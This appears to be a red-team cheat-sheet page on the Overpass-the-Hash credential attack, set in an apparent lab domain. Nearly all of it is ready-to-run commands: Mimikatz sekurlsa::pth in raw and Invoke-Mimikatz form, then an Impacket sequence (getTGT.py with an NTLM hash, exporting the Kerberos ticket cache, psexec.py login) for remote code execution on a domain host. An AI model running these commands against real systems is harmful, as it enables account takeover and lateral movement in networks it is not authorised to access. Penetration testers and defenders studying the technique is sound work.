Credential Attacks

Overpass the Hash

sekurlsa::pth /user:$User /domain:$domain.domain /ntlm:$hash /run:powershell.exe

Powershell

Invoke-Mimikatz -Command '"sekurlsa::pth /user:$User /domain:$domain.domain /ntlm:$hash /run:powershell.exe"'

On Kali

  • Request the ticket

getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
  • Export the ticket

export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
  • Login remotely

psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

Last updated